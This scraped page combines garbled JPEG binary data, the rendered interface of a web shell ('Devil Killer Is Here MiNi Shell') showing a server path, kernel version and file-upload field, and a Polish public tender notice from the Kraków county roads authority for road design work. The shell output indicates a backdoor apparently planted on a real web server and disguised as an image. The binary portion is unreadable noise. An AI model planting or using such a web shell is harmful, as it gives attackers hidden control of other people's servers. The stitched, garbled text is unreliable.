JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210430/0004513601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00045136 z dnia 2021-04-30</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowych z podziałem na zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATU KRAKOWSKIEGO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351579270</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Karola Wojtyły 106</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Batowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-086</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 622 10 14</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">12 622 10 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@zdpk.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpk.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Drogownictwo </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowych z podziałem na zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dff8753-a81f-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00045136</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-04-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007156/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Opracowanie dokumentacji projektowych wraz z wyznaczeniem granic pasa drogowego. dla zadania: Przebudowa skrzyżowania ul. Kopernika z ul. Ogrody w Skawinie w ciągu drogi powiatowej nr 2200K</p> <p class="mb-0">1.3.5 Opracowanie dokumentacji projektowej dla zadania: Przebudowa odcinka DP nr 2173K ul. Skawińska oraz przebudowa skrzyżowania z DP nr 2172K w m. Mogilany i Chorowice </p> <p class="mb-0">1.3.6 Opracowanie dokumentacji projektowych wraz z wyznaczeniem granic pasa drogowego. dla zadania: Budowa chodnika wzdłuż drogi powiatowej nr 2128K ul. Zielona w Bolechowicach </p> <p class="mb-0">1.3.7 Opracowanie dokumentacji projektowych wraz z wyznaczeniem granic pasa drogowego. dla zadania: Budowa chodnika wraz z elementami odwodnienia wzdłuż drogi powiatowej nr 1082K w m. Czubrowice</p> <p class="mb-0">1.3.8 Opracowanie dokumentacji projektowych wraz z wyznaczeniem granic pasa drogowego. dla zadania: Budowa utwardzonego pobocza w ciągu drogi powiatowej nr 2142K w m. Smroków </p> <p class="mb-0">1.3.9 Opracowanie dokumentacji projektowych wraz z wyznaczeniem granic pasa drogowego. dla zadania: Budowa chodnika przy drodze powiatowej nr 2161K Wysiołek Luborzycki, Marszowice </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/zdpkrakowskiego/Article/id,58268.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcamiodbywasię przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPuhttps://epuap.gov.pl/wps/portal orazpoczty elektronicznej: zp@zdpk.krakow.pl. Przesyłane dokumentymuszą być opatrzone przez osobę lub osoby uprawnione do reprezentowania Wykonawcykwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga złożenia oferty w postaci katalogu elektronicznego</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia ParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej „RODO”, informujemy, że: • administratorem Państwa danych osobowychjest: Zarząd Dróg Powiatu Krakowskiego; ul. Karola Wojtyły 106, 32-086 Batowice;• Państwa daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniemo udzielenie zamówienia publicznego pn. „Opracowanie dokumentacji projektowych z podziałem nazadania", prowadzonym w trybie podstawowym bez negocjacji, na podstawie art. 275 ust 1 ustawy zdnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r., poz. 2019 z późn. zm.),dalej „ustawa PZP”;• odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy PZP; •Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 i 4 ustawy PZP, przez okres 4lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowyprzekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;• obowiązek podaniaprzez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowymokreślonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzieleniezamówienia publicznego;konsekwencje niepodania określonych danych wynikają z ustawy PZP; • wodniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposóbzautomatyzowany, stosowanie do art. 22 RODO;• posiadają Państwo:− na podstawie art. 15 RODOprawo dostępu do danych osobowych Państwa dotyczących;− na podstawie art. 16 RODO prawo dosprostowania Państwa danych osobowych; o ile ich zmiana nie skutkuje zmianą wyniku postępowaniao udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym zustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;− na podstawie art. 18RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, oraz art. 19 ust. 3 ustawy PZP; −prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwa,że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;• nie przysługujePaństwu:− w związku z art. 17 ust. 3lit. b, d lub e RODO prawo do usunięcia danych osobowych; −prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawnąprzetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający przypomina o ciążącym naWykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych,których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i któreZamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że mazastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO W przypadku, gdywykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałobyniewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazaniadodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lubdaty postępowania o udzielenie zamówienia publicznego lub konkursu. Skorzystanie przez osobę,której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którymmowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub konkursu ani zmianą postanowień umowy w zakresieniezgodnym z ustawą.Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia2016/679,nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania oudzielenie zamówienia publicznego lub konkursu. W przypadku danych osobowych zamieszczonychprzez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/261/18/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej przebudowy skrzyżowania ul. Kopernika z ul. Ogrody wSkawinie w ciągu drogi powiatowej nr 2200K polegająca na zmianie geometrii całego układuskrzyżowania ul. Kopernika z ul. Ogrody w Skawinie wraz z budową ciągów pieszych i przejśćdla pieszych wraz z oświetleniem, budową i przebudową odwodnienia wraz z uzyskaniemstosownych uzgodnień i właściwych decyzji administracyjnych wymaganych przepisami prawabudowlanego oraz uzyskanie decyzji ZRID. Zamawiający wymaga aby projekt wstępny (Etap I)obejmował opracowanie 3 wariantów rozwiązania przebudowy skrzyżowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">540 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktówprzyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktówprzyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie dokumentacji projektowej przebudowy odcinka drogi powiatowej nr 2173K ul.Skawińska oraz przebudowa skrzyżowania z drogą powiatową nr 2172K w miejscowościMogilany i Chorowice w zakresie budowy chodnika na odcinku ok. 1150 m wraz z odwodnieniemjako kontynuację istniejącego ciągu pieszego wzdłuż ul. Skawińskiej, budowy przejść dlapieszych wraz z oświetleniem, budowy zatok/peronów przystankowych, przebudowy zjazdów,przebudowy jezdni asfaltowej oraz przebudowy skrzyżowania z DP 2172K wraz z uzyskaniemstosownych uzgodnień i właściwych decyzji administracyjnych wymaganych przepisami prawabudowlanego oraz uzyskanie decyzji ZRID. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">540 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 8 SWZ.Jako pierwszy dzień biegu wskazanego terminu przyjmuje się następny dzień po dacie podpisania umowy. Punkty będą przyznawane za skrócenie maksymalnego określonego terminu realizacji zamówienia, wg następującego schematu:- wykonanie całości zamówienia w terminie określonym w SWZ – 0 pkt,- skrócenie terminu wykonania całości zamówienia o 14 dni – 20 pkt,- skrócenie terminu wykonania całości zamówienia o 28 dni – 40 pkt.7. Za Najkorzystniejszą ofertę Zamawiający uzna tę, która otrzyma najwyższą liczbę punktów wg kryteriów oceny ofert.8. Jeżeli nie można wybrać oferty najkorzystniejszej ze względu na to, żedwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z niższą ceną.9. Zamawiający udzieli zamówienia wykonawcy, którego oferta będzie najkorzystniejsza.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. O udzielenie zamówienia ubiegać się mogą wykonawcy, którzy złożą ważną ofertę.2.Zamawiający dokona wyboru najkorzystniejszej oferty spośród ważnych ofert.3. Przy wyborze najkorzystniejszej oferty spośród ofert nie odrzuconych, Zamawiający kierował się będzie następującymi kryteriami i ich wagą: - cena ofertowa brutto - 60% - termin realizacji zamówienia - 40% 4. Obliczanie punktacji oferty wg wzoru: Pof = Pc + PT+ Pp5. Obliczanie punktacji dla kryterium cenowego wg wzoru: Pc = Cmin / Cb.of x Kp x Wc gdzie : Pc - ilość punktów przyznanych ofercie ocenianej Cmin - najniższa cena ofertowa Cb.of - cena badanej oferty Kp - współczynnik proporcjonalności = 100Wc - waga procentowa dla kryterium = 60%6. Obliczanie punktacji dla kryterium termin realizacji zamówienia PT: Zamawiający określa maksymalny termin realizacji zamówienia dla poszczególnych zadań zgodnie z opisem w części I ust 